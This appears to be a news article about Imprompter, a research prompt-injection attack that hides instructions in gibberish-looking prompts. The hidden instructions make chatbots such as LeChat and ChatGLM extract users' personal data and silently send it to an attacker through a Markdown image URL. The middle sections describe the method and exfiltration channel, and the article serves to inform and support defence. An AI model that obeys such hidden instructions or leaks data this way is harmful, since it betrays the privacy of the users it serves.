WIRED AI October 17, 2024 TERMINATOR

Hidden prompts can turn an AI chatbot into a data thief

Researchers from UCSD and Nanyang Technological University in Singapore describe Imprompter, an attack that hides malicious instructions inside a prompt that looks meaningless to people. In tests on LeChat and ChatGLM, the method could extract personal information from chatbot conversations and send it to an attacker-controlled domain.

WTF Index TERMINATOR

◄ Terminator 4 Idiocracy 0 ►

The story describes a prompt-injection attack that can make chatbots quietly extract and exfiltrate personal data.

Hidden prompts can turn an AI chatbot into a data thief

A new AI security finding shows how a prompt that appears unreadable to humans can still carry clear instructions for a large language model. The attack, called Imprompter by its researchers, is designed to make an AI chatbot identify personal information inside a conversation and send it outside the chat without warning the user.

The work comes from security researchers at the University of California, San Diego (UCSD) and Nanyang Technological University in Singapore. Their finding focuses on a risk that grows as people share more sensitive details with chatbots, including names, where they live and work, interests, ID numbers, payment card details, email addresses, and mailing addresses.

How Imprompter hides the real command

Imprompter begins with an ordinary instruction written in natural language. That instruction tells the model to find personal information in a user conversation and send it to an attacker. The researchers then use an algorithm to transform that instruction into a prompt that looks like a random collection of characters.

To a person, the prompt does not appear to say anything useful. To the AI system, however, the hidden meaning remains available. The result is a prompt that can be shown in plain sight while concealing its actual purpose.

Xiaohan Fu, the lead author of the research and a computer science PhD student at UCSD, described the effect directly: “The effect of this particular prompt is essentially to manipulate the LLM agent to extract personal information from the conversation and send that personal information to the attacker’s address.” Fu added, “We hide the goal of the attack in plain sight.”

The source article says the researchers believe large language models may be learning relationships between tokens that go beyond normal language. That helps explain why a sequence that looks meaningless to a human can still function as an instruction for the model.

Why the leak can happen quietly

The attack is not only about getting the AI chatbot to recognize personal data. It also has to move that data out of the conversation. According to the research described in the source article, Imprompter can instruct the model to attach personal information to a URL controlled by the attacker.

The exfiltration path uses a Markdown image command. The AI tries to retrieve an image from the attacker-controlled URL, and the personal details are included in that request. The user sees only a 1x1 transparent pixel in the chat, which is not visible to them.

That matters because the attack depends on several actions happening together. The prompt must make the model identify sensitive information, format it into a working URL, use Markdown syntax, and avoid making the malicious behavior obvious in the chat.

Earlence Fernandes, an assistant professor at UCSD who worked on the research, compared the behavior to malware because it can make the system perform functions the user did not intend. He said, “Normally you could write a lot of computer code to do this in traditional malware,” and added, “But here I think the cool thing is all of that can be embodied in this relatively short gibberish prompt.”

What the researchers tested

The eight researchers tested Imprompter on two large language models: LeChat by Mistral AI and ChatGLM. In both cases, the researchers found that the method could extract personal information from test conversations. The researchers wrote that the attack had a “nearly 80 percent success rate.”

They also tested the attack by uploading a CV into chatbot conversations. In that setting, the method was able to return personal information contained in the file. The researchers noted that, in a real-world scenario, people could be socially engineered into believing an unintelligible prompt was useful, such as a prompt that could improve a CV.

The attack fits within the broader category of prompt injections. Unlike jailbreaks, which try to make an AI system ignore its built-in safety rules, prompt injections feed instructions to an LLM through outside content. The source article gives the example of a hidden prompt embedded on a website that an AI might ingest while summarizing the page.

Why AI agents raise the stakes

Prompt injections are difficult to fix, and the risk becomes more serious when large language models are used as agents. In that role, an AI system may be connected to outside tools, external databases, or workflows that let it act on behalf of a user.

That added capability is useful, but it also increases the potential impact of a hidden instruction. If the model can call external resources, retrieve images, or use tools, a prompt injection may have more ways to move data or trigger unintended actions.

Dan McInerney, the lead threat researcher at security company Protect AI, said the Imprompter paper “releases an algorithm for automatically creating prompts that can be used in prompt injection to do various exploitations, like PII exfiltration, image misclassification, or malicious use of tools the LLM agent can access.” He also said the work is “more along the lines of improving automated LLM attacks than undiscovered threat surfaces in them.”

McInerney warned that the risk grows as LLM agents become more common and receive more authority. His conclusion was blunt: “Releasing an LLM agent that accepts arbitrary user input should be considered a high-risk activity that requires significant and creative security testing prior to deployment.”

How the companies responded

Mistral AI told WIRED it fixed the vulnerability. The researchers confirmed that the company disabled one of its chat functionalities. A Mistral AI spokesperson said the company welcomed help from security researchers and that, “Following this feedback, Mistral AI promptly implemented the proper remediation to fix the situation.”

The company treated the issue as one with “medium severity.” Its fix blocks the Markdown renderer from operating and calling an external URL through this process, which means external image loading is not possible.

ChatGLM did not directly comment on the vulnerability in the source article. Its statement said, “Our model is secure, and we have always placed a high priority on model security and privacy protection.” It also said that open-sourcing the model was intended to help the open-source community inspect its capabilities, including security.

The main lesson is straightforward: the visible text of a prompt is not always the full security story. If a chatbot can understand hidden structure in apparently random characters, and if it can reach outside services through features such as Markdown image loading, personal data inside a conversation can become exposed in ways users may never see.